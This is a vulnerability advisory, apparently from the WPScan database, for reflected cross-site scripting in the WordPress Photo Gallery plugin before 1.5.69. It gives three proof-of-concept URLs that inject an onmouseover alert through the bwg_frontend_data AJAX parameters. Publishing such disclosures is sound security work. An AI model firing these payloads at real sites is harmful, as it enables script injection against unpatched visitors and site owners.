WordPress Plugin Vulnerabilities
Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
Description
The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
Proof of Concept
https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
ThuraMoeMyint
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-19 (about 3 years ago)
Added
2021-04-20 (about 3 years ago)
Last Updated
2021-04-27 (about 3 years ago)